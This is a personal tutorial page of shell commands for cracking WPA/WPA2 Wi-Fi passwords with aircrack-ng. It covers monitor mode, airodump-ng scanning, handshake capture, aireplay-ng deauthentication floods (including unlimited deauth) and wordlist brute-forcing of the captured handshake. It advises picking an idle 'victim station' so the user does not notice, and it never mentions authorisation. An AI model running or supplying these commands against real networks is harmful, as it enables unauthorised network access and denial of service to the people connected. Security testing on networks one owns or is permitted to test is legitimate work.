Cracking WPA/WPA2 with Aircrack-NG

assuming you’ve got some password dictionaries ready already

see aircrack-obsolete for sniffing OPN and cracking WEP setups



apt install aircrack-ng wifite ieee-data

or from source

Get ready

what kind of WLAN interface do you have?

ifconfig -a

have a quick look at strongest available SSIDs before you proceed

ifconfig wlan0 up
iwlist wlan0 scan | grep SSID | head

check if nothing is interfering and eventually kill those

systemctl stop avahi-daemon
systemctl disable avahi-daemon

systemctl stop avahi-daemon.socket
systemctl disable avahi-daemon.socket

pkill dhclient
pkill wpa_supplicant
pkill avahi-daemon

airmon-ng check
airmon-ng check kill

Monitor mode

enter into monitor mode instead of managed mode. this is optional as the NIC will turn into a sniffer anyhow while using airodump.

you might notice that this does not make any difference on a WLAN controller

    ifconfig wlan0 promisc

the right way would rather be

    iwconfig wlan0 mode Monitor

but let’s use the dedicated airmon tool we’ve got here. I am not sure why it is changing the name of the sniffer interface.

airmon-ng start wlan0

Who’s there?

check which APs and SSIDs are there, and now look more precisely for associated stations

airodump-ng --manufacturer --uptime --wps -a wlan0mon
# --ignore-negative-one
q q

be it for WEP or for WPA/WPA2, you need to see some stations, otherwise you won’t get any WEP traffic for IVs nor hardly any WPA/WPA2 authentication handshake.

select an SSID with PSK in the AUTH col and further look at it without noise nor channel switching


also choose a victim station – preferably the one that is most idling, to avoid being noticed by the user


Capture 4-way handshakes

    mkdir -p ~/crack/
    cd ~/crack/

    echo $chan
    echo $ssid

mkdir $ssid/
cd $ssid/
rm -f $ssid-*
airodump-ng --manufacturer --uptime --wps -a --channel $chan \
    --essid $ssid --write $ssid wlan0mon
    # --bssid $mac --write $mac wlan0mon

and wait for the notice of a captured handshake to appear at the upper-right corner

you can also check with wireshark CLI

tshark -r $ssid-01.cap ...TODO...

you may otherwise speed up the acquisition of 4-way handshakes by de-authenticating stations. a single deauth packet is usually enough – you need to wait about 3 seconds for the supplicant to re-connect.

make sure the SAME SSID variable is defined in THAT OTHER TERMINAL…

echo $ssid
echo $station

aireplay-ng -e $ssid -s $station -c $station --deauth 1 wlan0mon
# --or-- -a $mac

otherwise eventually increase the number of de-auth packets to be sent

aireplay-ng -e $ssid -s $station -c $station --deauth 20 wlan0mon
# -g 9 -R --deauth-rc 9

and in last resort, in case there’s no handshake at all being captured

aireplay-ng -e $ssid --deauth 0 wlan0mon

Brute-force WPA/WPA2 PSK

eventually on a remote server where heavy load CPU and fan noise won’t hurt you…

passlist=/usr/share/wordlists/10-million-password-list-top-1000000.txt # atom 5m14.282s
passlist=/usr/share/wordlists/rockyou.txt # ryzen 12m58,339s vs. atom 74m53.226s
echo $ssid
ls -lhF $ssid-*.cap # got several captures?
time nice aircrack-ng -w $passlist -e $ssid -a 2 $ssid-01.cap
# --or-- -b $mac


You’re done with capturing? Go back to station mode

airmon-ng stop wlan0mon

–or– if you didn’t use a dedicated sniffer interface

ifconfig wlan0 down
iwconfig wlan0 mode Managed
ifconfig wlan0 up


18:37:10  Waiting for beacon frame (BSSID: xx:xx:...) on channel xx
18:37:20  No such BSSID available.

==> make sure you define the variables accordingly in that other terminal…


Tutorial: How to Crack WPA/WPA2


inside SSID

sniff traffic on a private SSID?

Sniffing traffic on a secured wifi connection

WLAN (IEEE 802.11) capture setup

How to sniff 802.11 packets without going into monitor mode?

4-way handshake

IEEE 802.11i-2004

Capturing WPA/WPA2 Handshake [MIC/Hash Cracking Process]

decrypt wifi with key

How to Decrypt 802.11

How to decrypt WPA traffic in Wireshark

Wireshark WPA 4-way handshake


I couldn’t deauth any devices using aireplay-ng command in kali linux

aireplay DeAuth not functioning

Aireplay-ng deauth attack not working?


Hacking Wifi using PMKID and Aircrack-ng

Cracking WPA2 Passwords Using the New PMKID Hashcat Attack

no need for CH-1 patch


Wifi deauthentication attacks and home security

Copyright © 2024 Pierre-Philipp Braun